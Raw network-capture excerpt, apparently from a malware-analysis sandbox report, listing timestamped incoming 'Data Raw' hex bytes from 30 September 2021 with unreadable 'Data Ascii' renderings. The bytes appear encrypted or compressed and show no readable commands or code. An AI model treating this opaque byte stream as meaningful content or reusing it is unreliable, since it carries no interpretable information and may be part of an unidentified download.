41 b2 41 a4 cb ce d5 c2 b0 a4 55 25 0b 17 6c c8 33 19 84 38 e7 e9 8e ee dd 7d f5 ac ef 13 8c 1f 97 44 10 bc a5 f8 b3 31 87 d9 d3 ab 6a 83 87 13 25 1f 4b ca 7c 36
                                                                  Data Ascii: #fVK0!Bz3157IG$]{qE}q#7h6xMd"*zK/qM|]02al c1IuD[uN+)a\}X9!3-5T-7ybi5=RK92.AAU%l38}D1j%K|6
                                                                  2021-09-30 21:52:28 UTC1040INData Raw: 06 ca cd f2 b7 13 f1 e9 00 23 fd a6 1d 42 59 14 92 28 e9 bf 54 66 de b2 74 53 c5 96 b2 92 78 c8 00 7d fa d0 59 1d 47 9b a1 2b a0 b1 a2 29 46 7e ef 7a 9d 02 39 6d 4c fc 7e 99 60 ee 3f d5 c1 6d 61 55 6f 6b 27 35 4e 9a 71 7e 61 00 b3 fb 32 92 11 7f c1 40 91 0d 74 8a 96 c7 76 5a eb 2d 83 6c cc f5 88 21 02 98 2e ed 4d 2e 29 3c 03 a0 a2 b9 5e ff 0b 65 fc f3 9b 14 22 39 c7 24 b9 60 68 da 2a 96 b3 9f e9 45 cb 64 44 62 14 b4 68 3d 7e 6e 2f 40 07 8c 86 75 52 f1 fc 8c 1e 07 74 8c ff 89 19 fe d8 69 9b dc 6f 2a 07 4a a1 47 24 ea dc ba 03 07 4d 79 9b 58 8b 40 89 d4 c2 c0 c7 30 26 e0 da 2b f0 94 05 b3 88 08 88 4a 6a f7 fd c0 6f 3e bc 45 52 f0 f7 92 b5 6a 6b 17 07 f5 c9 ff fd 21 fc 3d 90 62 41 12 71 a1 2a c3 9f 1e 94 b1 85 9e 84 93 b5 05 00 f1 f4 9a 54 d2 b9 63 0f 93 fc
                                                                  Data Ascii: #BY(TftSx}YG+)F~z9mL~`?maUok'5Nq~a2@tvZ-l!.M.)<^e"9$`h*EdDbh=~n/@uRtio*JG$MyX@0&+Jjo>ERjk!=bAq*Tc
                                                                  2021-09-30 21:52:28 UTC1056INData Raw: 53 91 aa ff 9d 89 f8 97 e7 cb 10 ac 06 ca 43 cb f7 05 f2 fb b0 60 f2 bc 3d 97 d5 88 68 82 82 cc 0f cd 10 21 99 4b 7b 6d a0 dd f0 36 28 5a 44 02 80 dc e0 a0 f8 21 54 49 2d 4f 7e 81 a5 22 61 ed cb 10 d6 9c 5e 3b 38 fe 17 7a 90 c8 38 a5 fa 75 6e 6e 0a 0b ac 74 6f 6c 79 bc 9d 51 5f 17 ab 96 7e 37 ad 01 c7 b4 8b e9 ca d3 3d d0 ae 0f 40 7c 7b ba eb d5 7a 68 b9 6e d1 c7 11 8f 41 c4 de 8b 4c f4 ab 4e e4 20 0b 96 7c d5 a3 40 45 bb 46 bd 7e 2d 3a 91 9e be 36 9a 44 06 50 4e 9c 2f f9 84 18 90 a2 7f ea d2 b4 aa 62 25 b3 c4 02 69 2e 16 ad 36 39 63 86 2d 43 c3 21 b2 e3 f8 28 25 39 e1 b1 36 2f 49 7a 37 04 1e 63 e8 04 62 ad 81 b4 2c 5b b3 5e c4 7f a1 d1 8e 5f c2 15 b3 9e 31 0b 89 b2 c8 a6 07 9f 50 cd 7c 07 74 40 27 de fe 8f 65 09 b9 e6 bd d6 1b a3 02 b3 bf ce 10 53 cc ec
                                                                  Data Ascii: SC`=h!K{m6(ZD!TI-O~"a^;8z8unntolyQ_~7=@|{zhnALN |@EF~-:6DPN/b%i.69c-C!(%96/Iz7cb,[^_1P|t@'eS
                                                                  2021-09-30 21:52:28 UTC1072INData Raw: d3 e3 1e ae 05 b6 70 83 c4 f5 92 ad 54 05 74 f4 a1 f5 91 14 66 f1 8c 7b e5 e1 df 00 90 1d fc 21 bf 82 89 8f 3f 4f c3 e4 21 0f 5f 67 de af e9 c0 42 da af 0b c8 66 c5 0d 0a cb 12 31 9f 39 48 95 57 b2 19 c7 44 e7 fb 74 7c 7b 8e a9 18 14 be 5c 63 43 f8 02 22 11 3e c0 c7 e8 c0 96 9d 5a 38 0b 4d 6f cd fe 78 80 cd 38 4a 6d 4b c8 e7 ab 54 03 cf a7 4c de bc 0b 49 b7 a3 4b db d2 78 1b 69 4e 92 56 8e cc 85 2c 4a b4 fd 4e 65 5c c6 23 18 2a 5c 99 d8 a2 45 0d db 4c a2 08 e7 bd 23 67 0a 21 4a 20 0d 10 88 4e d6 d0 d9 86 80 9a 8a 1b ad f5 2d e1 a9 d3 70 9b 21 41 0a 33 54 3c 97 06 1c 63 1b 06 21 8d ce 34 b7 0a 72 55 57 ac 70 fc c7 95 9d c2 92 05 2a 77 8e c6 2f 5b 17 7c 90 46 f7 3d 3a 7d c9 49 55 66 3b 00 c2 5f e4 53 c0 d3 ea 1c a5 f1 0b 06 c9 a0 11 4f 8f 78 18 5c 2a a7 b1
                                                                  Data Ascii: pTtf{!?O!_gBf19HWDt|{\cC">Z8Mox8JmKTLIKxiNV,JNe\#*\EL#g!J N-p!A3T<c!4rUWp*w/[|F=:}IUf;_SOx\*
                                                                  2021-09-30 21:52:28 UTC1088INData Raw: a7 d8 3f 3b 2a b5 58 99 f7 23 09 90 3f 5e 37 38 21 d0 ba b8 20 9b d1 41 43 f0 2f 04 35 ad 70 6f 5b af 98 41 c8 c1 07 f6 a3 b6 22 d1 ff 6d 75 dc 0c 3a c2 aa 87 16 f8 1b 03 8c 98 e2 2b c5 58 a0 cd ae 37 25 fb a5 9a 7b ef e2 af 04 3f d2 cb c0 cd 0b d3 c6 e4 96 a2 7e d3 87 27 f9 f8 9a 25 70 59 c4 cc ea dc 26 04 91 b8 85 38 96 c7 60 79 d0 6a b1 19 cd b9 e2 94 a2 ac a0 05 70 f6 de 22 66 fa f1 d6 36 6c d1 3e a6 7a bf b8 59 08 8c 17 27 bb f5 c7 02 cb d3 f4 0d 57 c5 d2 a4 3c de 44 17 09 80 a4 fb 6f 99 e7 92 5d df 6f ae 67 10 59 d9 1c 0a e4 ef 93 f3 45 3a 51 97 a3 e5 05 51 c7 52 e8 ca 45 25 c3 fa 63 eb 5f 37 1a a3 47 2c aa 55 80 ae 7f d4 0c 25 13 a8 c4 d5 29 34 27 a4 8d d1 67 67 77 19 5d c1 54 9b f2 64 40 d9 e2 51 01 c5 1e 2c f7 29 7f 11 ed 23 dd 9b 56 20 a9 e1 a1
                                                                  Data Ascii: ?;*X#?^78! AC/5po[A"mu:+X7%{?~'%pY&8`yjp"f6l>zY'W<Do]ogYE:QQRE%c_7G,U%)4'ggw]Td@Q,)#V
                                                                  2021-09-30 21:52:28 UTC1104INData Raw: 65 93 ec 74 99 ab ce 7e 7c 89 cf c7 56 89 4f 71 81 cc 7c dc 49 e9 1e d8 9b d5 ca c1 0f d3 ba 21 7f f6 57 72 99 0c 8c 44 0b fd 6e 47 4a 21 75 d3 5a a2 be d4 dc f7 85 08 4e ea 28 d1 1e 0b 70 4b d0 88 d7 4f 47 1b f9 ca 9e 9a 96 1d 9d 40 0f b9 a0 dd d2 c6 7e 7d 91 cd 66 86 27 a3 d0 bb 0a 3d 46 80 da 4d a2 98 fb 0d 65 c3 69 b0 ef d0 fb ec 3c 9f 42 48 f3 ab 12 5e 6b 94 5e 1b 03 84 3c 1e 80 d8 17 94 6f 2d 1e bf f6 53 cd 65 ed 30 58 e1 1a fa 7e 08 a3 e5 0f fc fa 16 1b 7a f3 9a 3b a4 5a 6a 0e 63 4c c4 19 d6 dc 8d f5 60 c6 69 46 89 4e 18 36 eb 3f f6 06 9d a4 a6 8d f9 1c db b1 c4 7a a8 17 51 1b fc 4b 41 e7 5f 80 0d 7d 1c 74 26 8c d2 fd 8c cd 3f d3 6d 25 4a 0a 37 c0 77 08 58 48 f4 49 0e 31 fd 33 c4 55 c4 fd 84 12 f4 0f 06 d7 e5 dd 2b cd 1f ab 15 08 fe 6c dd 20 3b a7
                                                                  Data Ascii: et~|VOq|I!WrDnGJ!uZN(pKOG@~}f'=FMei<BH^k^<o-Se0X~z;ZjcL`iFN6?zQKA_}t&?m%J7wXHI13U+l ;
                                                                  2021-09-30 21:52:28 UTC1120INData Raw: c6 19 c1 25 d3 71 55 17 24 f2 dd bc 88 ee 82 23 3b b3 b8 7b 16 f3 ab 68 bc 53 70 14 14 e9 48 af b3 f5 12 8c 6f 58 6d e8 5a 6c 48 4e a0 00 da cb fa 79 3b 69 72 6c 15 1e aa 7f ad 7a 6e eb 9c 3f 46 5c 12 79 cc 5d 75 86 f2 d8 38 c3 4e 68 f8 4d c8 e2 aa 50 86 5d 98 0d 97 23 79 3e 8d b7 90 cb e0 ff 9c 29 00 c7 3d b7 27 73 9d e2 8a 0f a8 a8 32 87 4e 35 a4 e0 02 d5 57 e9 77 1b cc fe 30 7b 18 e0 0c 7d 3a 8f b7 50 6c 17 f6 70 a4 9c bd c5 4c 5c d5 2e 99 d5 58 eb e6 8b 37 eb d6 12 1b f7 81 c0 09 73 ca 98 3b 23 8f c5 bb c1 02 3c 8e 02 2c 40 5d d5 ec df 6c 6b e1 65 03 06 ac 71 e7 9e 4a cb 25 34 1d c8 90 a2 fe 40 3f 56 36 ad cd 99 fe 8b 33 e6 a8 1c b5 65 92 4e 9e 05 8d dc fb 84 0b d5 fc da fd 2f cd f1 e0 ac 41 21 93 21 ce 03 f2 a5 a8 e1 3e 2b 3b 80 91 b2 7e d8 fe 39 4a
                                                                  Data Ascii: %qU$#;{hSpHoXmZlHNy;irlzn?F\y]u8NhMP]#y>)='s2N5Ww0{}:PlpL\.X7s;#<,@]lkeqJ%4@?V63eN/A!!>+;~9J
                                                                  2021-09-30 21:52:28 UTC1136INData Raw: e0 59 17 aa 70 b6 a4 de b4 31 c8 ab a5 2a b0 13 f5 de e1 00 2c 99 e3 aa 7e 5e ae 4d 71 a5 d9 af 93 e0 48 db f6 a9 f8 5f 25 be 36 68 63 09 2d 62 bd b6 ff 1d ed cb a3 1b e5 de 63 27 a3 e2 94 fa d1 c4 20 8c 19 ab ca 9b 6a c7 13 19 19 3c af fc e9 51 e2 68 04 ba a7 6d 21 95 a0 f1 b2 1f 5a 56 91 b2 01 34 1b f2 39 62 f4 0d 6a af 57 76 f3 27 87 66 fc 22 96 b6 75 7d dc 8b 9e 18 f5 db e3 cb 8a 0a 60 66 90 6c ca f3 6f 46 8d 96 e5 d5 a1 f2 52 1d 40 3c 23 43 84 b6 43 88 a6 7c 43 c9 4f a5 78 1a af 57 98 4b 3f 8f ed 09 b1 ac 42 f4 73 ca 0a 37 39 17 85 97 6b d1 ae 92 f8 09 57 a6 57 86 ef 1e 6c 21 15 88 46 91 56 d3 1c f7 75 c9 90 9e 11 6a 1f 8e 00 f7 8d db ee 9d b6 e5 00 c9 60 41 43 ea 36 e6 17 73 c8 8b c9 be 4a c8 90 d0 23 9a 2a bb 75 0e 76 87 da 6b 65 34 7d d0 e5 c5 60
                                                                  Data Ascii: Yp1*,~^MqH_%6hc-bc' j<Qhm!ZV49bjWv'f"u}`floFR@<#CC|COxWK?Bs79kWWl!FVuj`AC6sJ#*uvke4}`
                                                                  2021-09-30 21:52:28 UTC1152INData Raw: 9a aa 1e 0a ce 2e 07 77 60 50 e2 49 25 41 a6 a2 cc 67 6f e3 1b 80 4b 51 c8 ba cf a4 85 f2 60 b6 59 be cd f7 00 64 6e 9c 5c 1e 50 64 9a db 81 db 02 fe 27 6f eb b1 47 e1 49 8d b0 34 b6 14 d8 e2 5a 87 e8 55 69 48 88 4d 88 fc 93 f8 2f fb af bb f5 99 f9 17 4e 8b 54 0c a7 44 be 6f 27 1a bf 30 fd a6 5b 5a 02 34 a9 b3 81 6c cd fe 7c 09 85 fd 5b fb 64 5e a6 a0 67 b6 40 1f 79 d3 ba 84 cc 96 db 68 b2 11 8e c2 14 ba a4 61 8a 98 2e 6c bf 85 ac 03 79 e8 7c 2a af b2 a6 8d da fd ca 8e ca bb 34 c4 cf 0d 6e c3 31 c9 9d 26 f5 b8 03 70 e4 ae a7 3d 01 8e 3c ac 4d 31 4b 51 23 77 86 48 12 08 80 1c 2b 78 51 16 6a e9 1b a2 95 de fa 20 d2 38 12 e8 21 c8 d3 32 a3 fb bd 6e 8b 5c ac a0 c2 46 83 db 6c f3 1b ed e7 4e 47 f1 92 7e af b8 f5 16 bb 7a 44 3b 33 e1 76 b6 9b 64 9e 22 74 7a ff
                                                                  Data Ascii: .w`PI%AgoKQ`Ydn\Pd'oGI4ZUiHM/NTDo'0[Z4l|[d^g@yha.ly|*4n1&p=<M1KQ#wH+xQj 8!2n\FlNG~zD;3vd"tz
                                                                  2021-09-30 21:52:28 UTC1168INData Raw: 31 20 2e 03 d0 fa fe b9 34 32 48 45 02 61 ec 07 9b 7f 8d 7b 81 58 ef d4 6b 98 36 8f ca 00 ec 46 ba 24 70 9f 0a b5 d6 51 3b b7 2a 1d bc e0 79 c6 25 a6 3e dc 6b 68 a8 cd 70 57 28 30 5d 9c a3 91 12 e1 7d 88 3d 40 e1 6f 5c a4 34 01 fe 90 54 58 e2 c7 87 9a 4c 67 93 f5 23 83 42 5a 91 54 8e 1a a3 2e c1 bf 37 5b ee 06 e1 ff 50 8d 07 5f ad cb 64 2e 0d aa 0e 7f 19 ca e0 6a bb 53 15 4a 16 05 13 e1 43 57 90 6b 63 6b 4c cc 2f 72 a0 0b cb 91 13 e1 cc d0 55 96 27 0a 8a c0 e8 b7 3d 67 69 8b 2f 3e cf 39 c4 c3 15 b6 d6 e4 d6 23 b2 fa 8c d7 77 35 ac bf 96 99 fd ac 79 33 d0 a5 59 38 a1 18 da 0b c2 ee fd 59 6f ae 3e a7 64 d5 c8 79 19 69 cb 5b f8 45 61 60 6d f8 71 51 bd 2e ed fb 83 69 71 30 24 df f5 84 12 3f 78 5b c1 d6 5e 3c 66 b2 56 83 4d de 81 dc c0 d6 46 9b 96 38 6c 6f dd
                                                                  Data Ascii: 1 .42HEa{Xk6F$pQ;*y%>khpW(0]}=@o\4TXLg#BZT.7[P_d.jSJCWkckL/rU'=gi/>9#w5y3Y8Yo>dyi[Ea`mqQ.iq0$?x[^<fVMF8lo
                                                                  2021-09-30 21:52:28 UTC1184INData Raw: 96 41 5e a2 45 4e a0 c6 05 f7 4e fb 56 28 2a e9 2d 68 f3 57 a1 e9 53 d8 ed 19 9c 6f 06 1e ff 47 7b 7b fc dd 8b ee 0f f8 71 27 47 c9 85 ae f2 51 1c 44 ca 3f ac 88 23 7a 00 52 15 d1 32 fa 6f dd 8a d5 4a 89 23 1b 33 45 54 20 7d 6c e8 8f 6c 4c db de 92 81 0a 9f c2 8e b6 c3 98 3b ca 18 3a b2 87 31 68 3f 75 c2 ad 98 e8 ab 93 78 d7 54 57 c4 08 30 91 31 8c f4 b9 0e db 57 90 83 fa 82 43 30 9e 4a b0 15 5c a3 9d 42 b4 92 82 41 fd 29 14 ff c6 53 6a 7c 81 a2 a4 d6 3c de 21 ae 2b 23 4a 89 dd da 98 b7 44 f2 a2 a3 e7 c3 b4 7e 61 b9 ed d1 3d d7 2d f4 c4 37 8b 66 a3 9b 14 78 af 02 78 b9 ae d4 5f c5 a2 9c aa d6 64 95 7d 69 1b c4 18 12 01 c9 f6 92 5a 6a 42 29 03 8a b9 48 af fc 64 7a 47 2a fa 04 c6 d5 e5 17 e8 59 6d 4b a5 33 df 2b 2e db dd 65 a0 34 c9 63 a4 d3 33 ec 7d 6c e4
                                                                  Data Ascii: A^ENNV(*-hWSoG{{q'GQD?#zR2oJ#3ET }llL;:1h?uxTW01WC0J\BA)Sj|<!+#JD~a=-7fxx_d}iZjB)HdzG*YmK3+.e4c3}l
                                                                  2021-09-30 21:52:28 UTC1200INData Raw: 1a 1e bf a5 98 1a 3d c5 65 16 71 1d 71 41 c8 96 05 d0 56 ee 61 fa ce a4 85 65 41 d6 e2 75 11 bc 7a 70 14 e8 ff 4b d9 2c c6 70 cf 23 ef d8 57 18 60 f3 ec c0 95 b5 de 60 56 4f 54 79 bd a5 dd dc ca 0b 1a 08 c0 6a 0e 26 1e 66 d8 bc ce f9 c7 03 2a 91 6c 25 81 50 e3 be d7 6a 26 12 22 9c fa b5 85 12 d7 5d 7d 7b c0 da ca 85 52 8a 0f 6c 21 10 ed 29 2f 14 d1 3e bf b9 56 45 c0 38 82 20 e9 d2 62 e9 ff 2d cb 31 51 fd 45 aa ab 5d 53 4a aa 40 89 df 06 9d a7 fd c0 ec e6 47 8e 8c 79 1a 6d d8 e7 6a 14 8d 51 da eb 82 72 23 f9 57 6e 6d 83 c8 7a 16 36 1d 35 30 c0 8e d1 11 01 cb 23 d1 65 96 41 db ce c6 d6 a9 4c 77 9a 9c 3c 6a 1b 9e c5 12 c3 16 88 e7 b6 51 08 75 34 96 41 02 d0 bc dd 14 1b b6 fa 98 38 81 d3 a8 bc d8 86 79 d4 f7 eb 2e 2b b8 b6 3d 86 0c b4 c9 40 b2 bd ab 74 1c 96
                                                                  Data Ascii: =eqqAVaeAuzpK,p#W``VOTyj&f*l%Pj&"]}{Rl!)/>VE8 b-1QE]SJ@GymjQr#Wnmz650#eALw<jQu4A8y.+=@t
                                                                  2021-09-30 21:52:28 UTC1216INData Raw: fa 53 f1 f6 6b 57 58 14 93 9c eb 5d db 70 60 14 8c df b7 59 13 25 b8 8f dc 3e f7 32 4e a0 76 31 47 6f f3 45 91 ce 3d af 8a 8f 29 e2 52 4d 5c 83 a6 92 e9 31 da 23 50 43 50 ae e4 95 06 8c c6 0a 26 85 ec 62 51 ad 48 fd 3a 75 fb a6 ef 20 3e 0e e8 1c 8f 64 1f 09 e0 da bb d0 59 28 25 2b 89 8e 1d 56 5c 69 8b b2 4f 56 e8 88 32 c2 c8 74 16 a8 17 23 17 bd 6b 72 ca 1e 93 30 4b 9a dd f7 66 40 da 3f e2 88 2f a3 35 fc af b9 56 ee 37 1f 43 db 57 df d9 00 8f dd 5f ae e7 e5 86 fb 2d 3b 74 0c 77 7b 40 df a8 2a 86 87 6d cc f6 3e 8a a3 94 b1 13 37 01 b9 f6 6e 10 7c fe 51 1b 05 96 ce cc f3 51 6d 9e f3 d8 d1 6d 44 4e fb b3 bd 9d fe 73 74 82 52 77 81 7d 20 76 e1 4d d4 13 7f 7a 66 d8 9e 1b 4c 79 d5 61 38 78 97 04 37 b2 ec f5 7b ad 49 a4 e6 96 20 76 de ed 12 43 ba bd 8e 46 c0 df
                                                                  Data Ascii: SkWX]p`Y%>2Nv1GoE=)RM\1#PCP&bQH:u >dY(%+V\iOV2t#kr0Kf@?/5V7CW_-;tw{@*m>7n|QQmmDNstRw} vMzfLya8x7{I vCF
                                                                  2021-09-30 21:52:28 UTC1232INData Raw: d8 49 df ff 7b c9 3b 62 bb aa 64 c4 51 6a 48 b5 37 e9 bb cc 7b c6 6c dd 2f 9c d5 fb 11 48 05 c1 7d df c6 2f bf fb b5 12 00 54 13 54 2c 53 f0 29 e3 07 3b 25 10 7f 0a 00 98 d3 fd 68 42 59 59 ce f8 a4 33 e9 aa a7 ae 4a 63 71 fc d9 d7 9b 7c 10 05 54 93 36 47 09 ff fd 9b 1e 64 42 08 db 5a d0 90 ce e7 03 74 31 1b 0a 1e 1b 6f 7f a4 fd 60 07 87 35 37 d0 07 d2 e0 07 11 00 ea b3 a0 ce 47 ea 13 a0 ec c9 5f 7a 71 2f d3 d0 5e f1 91 69 14 37 d2 6d df 10 12 4a e2 37 e1 f6 c0 fa 20 35 66 27 7a 77 78 8a 32 da f4 94 1d 46 08 de 36 e5 eb 09 83 3e 3e fb 7e 7c b0 69 06 a7 b4 db fe ce e0 72 c9 8b 70 78 9f de 4e 6e 40 4c a8 b1 88 ed 0f ea 86 e0 c0 2b db ba ee 0c 9e 59 d8 87 fe 9f 93 b6 66 4a a0 05 7c ab f8 95 7a d1 8b a9 b0 23 70 a4 34 76 fd e1 10 f4 09 75 aa aa f1 12 dc fe b2
                                                                  Data Ascii: I{;bdQjH7{l/H}/TT,S);%hBYY3Jcq|T6GdBZt1o`57G_zq/^i7mJ7 5f'zwx2F6>>~|irpxNn@L+YfJ|z#p4vu
                                                                  2021-09-30 21:52:28 UTC1248INData Raw: b6 e4 4c 55 28 64 05 48 de 15 b8 55 0d d8 79 3e eb f1 39 06 72 f1 1e 0b fa 47 4c ea ab 29 0c e2 76 aa 8f 4a 7f 24 c0 7e 27 38 91 ea 5a e9 7d 90 0d 5d 7c f5 2b 62 39 5e 15 2c 30 7e c1 53 8c b7 ec c4 e3 b6 12 8c 3f 4b 83 53 c6 0a 18 88 2d 48 2e 87 9c 67 a3 e5 6d 4f 2f 06 b7 1e 11 0f e9 3d 00 43 02 b9 36 9f cc 78 42 b7 8c 59 2f 59 c4 80 78 da 4f 29 b5 be bd e6 6c 1b 2a 9f 2c 74 02 3d 61 f2 ab 28 f3 a4 00 7b 25 4d 3c 19 5a c2 7f 42 51 e7 37 83 9f 3c fb 3e d5 2b e9 1b 6f 06 f6 59 c8 60 52 c8 ea a9 81 d1 ad 40 b6 ef 2f 18 06 da b2 dd 49 8b 03 3c c6 8d ec 5f 42 ad 82 46 fa 7e 7f 8c f2 9f f6 8c 17 ca aa 3e 3e 14 40 5d e3 fa 82 0b 48 89 53 e4 ad a6 11 fc 09 0b 0b 06 b8 d0 94 83 5f e0 87 20 1a 09 2b fd cd b7 c7 c6 52 d8 64 4d ce a5 e4 ab e9 c3 6f 66 f7 a7 97 ed 5b
                                                                  Data Ascii: LU(dHUy>9rGL)vJ$~'8Z}]|+b9^,0~S?KS-H.gmO/=C6xBY/YxO)l*,t=a({%M<ZBQ7<>+oY`R@/I<_BF~>>@]HS_ +RdMof[
                                                                  2021-09-30 21:52:28 UTC1264INData Raw: 1a ff ae fd 3d 05 83 56 b2 20 4b 87 ec b0 eb 2b c7 d7 2c d1 86 26 c9 8f b4 cf 2b e2 80 88 e4 6b 6f 3f c7 d8 e4 65 a8 b7 e1 19 b8 13 a2 c3 7e 0f 5c 15 f5 97 3b 5f 89 9e 3d 27 1a d1 da c4 e4 cf e3 d7 6c f6 0e 5d 41 8d 56 58 8f 07 0e c0 b0 cf 64 ce 6c 4c e6 48 c7 ea b3 79 aa e7 69 62 b3 5c 6b 53 64 e0 d7 0d 73 41 2c 04 7c 7d c0 1d 07 0b 76 3f ed d8 61 46 da d5 58 77 45 c5 5f 48 e8 8e 8c 25 be 22 ef ab ab 9f 64 80 11 cc 65 21 2b 9f 76 f0 24 41 f7 37 95 c0 71 d0 b4 3f e2 99 b7 c6 f7 56 21 d0 5f 9b 56 3c 9c c2 4b 8c 78 3e 18 8e b2 22 0c f0 01 29 20 b8 1f 44 03 96 9e f4 ff 67 68 d3 7b 2a 03 31 a7 80 63 ff 95 12 ee 7c 81 f4 7f 85 9d c2 b1 41 93 76 3c 5f e4 21 5a 70 7a 94 25 e4 21 f7 19 63 ce 98 bd 62 ae 3d 61 fd 3f c2 8c 02 79 fe 37 27 f2 54 02 35 80 f5 6f f8 c3
                                                                  Data Ascii: =V K+,&+ko?e~\;_='l]AVXdlLHyib\kSdsA,|}v?aFXwE_H%"de!+v$A7q?V!_V<Kx>") Dgh{*1c|Av<_!Zpz%!cb=a?y7'T5o
                                                                  2021-09-30 21:52:28 UTC1280INData Raw: 53 4b 82 2d d9 88 50 d2 1f e7 23 d6 f9 04 9d be 7f d4 3b e9 f5 68 84 43 18 55 0d aa 04 84 c9 e5 95 b9 6b 46 c3 97 b8 55 ba e1 62 97 91 2b cb 20 30 df e0 ad de 7b a0 0c 32 f9 b6 ef 8d 3b 72 5a fe 78 36 a5 a7 e2 0f 36 bf 1b ec 82 56 9e aa 77 55 b2 86 1d 19 bf c0 ca 5e bf 22 9f 6e 5d 29 23 4c 14 5e 51 fa 76 f8 b6 5b 3b 61 9c 97 57 b4 32 63 5f c9 81 cf 38 c4 79 c9 d8 48 ca 7e aa 93 ec cc 72 55 92 df f1 bb 80 f0 7f 8f b2 c8 13 32 ef e4 05 38 70 09 31 83 43 ab 49 82 40 bb 80 1c 34 78 9a cd 3b ef c9 4d d3 11 22 6f bc d6 3d 24 ef ad 45 0f 2d bc f0 8d 62 d4 0b 84 ea 8c 15 10 66 5e 26 32 85 0f 80 ba bf a6 6f 64 cb 34 6f 9c c0 12 37 67 02 d7 af d9 88 b6 a4 e6 26 e2 e9 9e 0b bf ea 35 dd eb 96 72 d5 70 da 43 0e 31 02 e4 d5 57 b8 fa 41 3d a6 4b d2 ca d0 60 0a 0f ad 58
                                                                  Data Ascii: SK-P#;hCUkFUb+ 0{2;rZx66VwU^"n])#L^Qv[;aW2c_8yH~rU28p1CI@4x;M"o=$E-bf^&2od4o7g&5rpC1WA=K`X
                                                                  2021-09-30 21:52:28 UTC1296INData Raw: 1e a0 64 69 be c0 a3 76 2b a7 ce 3a bb 02 b6 e9 f6 67 c2 17 cd ce 92 f5 1e 12 43 03 d9 87 8f 11 a1 d4 27 8f 61 29 d3 b0 07 3e af a3 d7 b8 07 d5 05 71 24 0c 54 2b e0 85 b3 ef 4f 2e 20 e9 3c 64 3e 81 ae 11 fd cc 5e 1a 6c 4a a2 10 5e 29 f0 2e 26 18 ce cf bb 3e 1b ce 14 8d 23 2e eb 0e d4 33 cf c8 34 70 02 d0 3d 94 6a dd 75 c9 af e8 58 dd e3 43 f9 68 f6 08 ff 1f 6f a4 ef 35 1a b7 ad 03 8f c1 56 89 f6 57 46 ce ad 2d 66 c4 ef 2c 2f 00 3e 6e 57 bf 70 5c 38 ed 62 4c 2d 0a f6 4a 71 dc fb 31 ce ea b6 89 24 5c 65 74 68 8d 5f e3 8d bf a3 ad 99 37 7b 1f 68 92 f8 a7 a3 14 e3 93 8c 7f 2b cb 1f 5f 75 64 be cf c3 38 a6 d3 ef 33 5b b9 61 85 b1 10 df a7 58 08 5c b2 f8 72 29 74 78 60 04 2f 40 e1 8d c2 d7 05 f1 ed 2c 6e 7c 33 f1 1d 4d 31 8b cf 16 8b 24 a0 a6 bd 36 40 a5 0e 05
                                                                  Data Ascii: div+:gC'a)>q$T+O. <d>^lJ^).&>#.34p=juXCho5VWF-f,/>nWp\8bL-Jq1$\eth_7{h+_ud83[aX\r)tx`/@,n|3M1$6@
                                                                  2021-09-30 21:52:28 UTC1312INData Raw: 96 69 c6 5d 28 8a b9 be 77 d2 7c a1 cc e0 3b 97 aa f3 15 95 83 f8 30 1a bc 6a 0c ca f6 21 b7 2e b9 7c a2 82 84 5d 95 55 28 cd 6f d8 a4 57 58 28 40 dd 8b 84 a9 cd 42 f7 43 93 94 c3 95 42 4c af cd 63 1e e6 ba 7e a6 5b 63 3f b6 2d 02 23 8d 5b 33 46 e4 69 e1 3c a3 3a b4 0d 9d 8f ba 50 14 be 79 71 5b d0 2b 61 26 ea 72 2e 9c 4c 8b f2 35 41 3b 37 28 df 46 98 db 8b 51 e1 a1 d3 83 ae cd 3a 17 68 83 02 08 15 e3 4a e8 94 89 4d f6 6f 2e 42 08 ee d3 39 8d 78 65 1d de a6 2a 09 3c 74 a0 b5 3c 4b 65 8c 0a 31 44 e8 7c e8 5f 22 b7 0b 07 24 e6 ce d1 66 5c 7b 32 99 93 c5 8a ea ae 1b 0f 2a 26 fc ff 01 aa f8 74 0d 3d 66 2c 19 52 21 2e 2a 8c 04 62 69 24 71 2d 89 ab ad 69 fe 12 c1 c1 7d 9c fd 1a 01 5c 49 09 8e 29 d8 e9 24 9c 02 bc ba fd 10 9c c0 c9 fb 42 3b e2 bc 35 27 68 3f d4
                                                                  Data Ascii: i](w|;0j!.|]U(oWX(@BCBLc~[c?-#[3Fi<:Pyq[+a&r.L5A;7(FQ:hJMo.B9xe*<t<Ke1D|_"$f\{2*&t=f,R!.*bi$q-i}\I)$B;5'h?
                                                                  2021-09-30 21:52:28 UTC1328INData Raw: b4 3b db 98 2c b8 cd cd 4a a3 4d da 42 72 fb f8 3b 97 89 f0 2c ec 45 d2 d3 a3 7e d8 8d 56 56 6b ae 55 aa a2 dd 9e 13 3e b6 17 11 3f e2 66 a6 74 90 11 6a c2 1b 37 91 3b b7 e2 bf 20 90 fa 1c 3e a5 90 87 18 15 8b 58 0d 9c 3d 59 e8 fc 28 81 3e c5 7a 91 b9 43 f9 f7 5d e4 a9 0d 56 3a f3 82 52 b9 23 ac 08 34 86 f6 fd ae 5d 1a 40 c6 26 45 e0 e4 0b 95 e4 e3 b7 5e bb d4 40 53 01 f4 c2 d7 60 5d dd 94 cb 54 ad f3 d5 a3 6c 53 76 88 f6 c3 2a 90 1c 2d 22 cf db e2 6a 7c 9c df 3a 14 08 a1 76 a8 38 ac c7 bb 0c dd b4 76 93 07 e8 0d e4 7f a1 77 2b 2e 62 e8 6c 8b f6 48 3d d0 cf 1d 64 05 b5 0d 09 03 56 2a c2 5d c3 a3 9a 90 57 3b 1e 6c e9 3c cd a7 3d 94 6d 66 40 d8 14 00 b8 a2 e2 28 67 a0 db ac 99 4e af 50 0b f2 ff b4 48 1b da d7 59 cd cf 5f a0 42 26 ca 5d d7 63 e4 ce 3b e7 65
                                                                  Data Ascii: ;,JMBr;,E~VVkU>?ftj7; >X=Y(>zC]V:R#4]@&E^@S`]TlSv*-"j|:v8vw+.blH=dV*]W;l<=mf@(gNPHY_B&]c;e
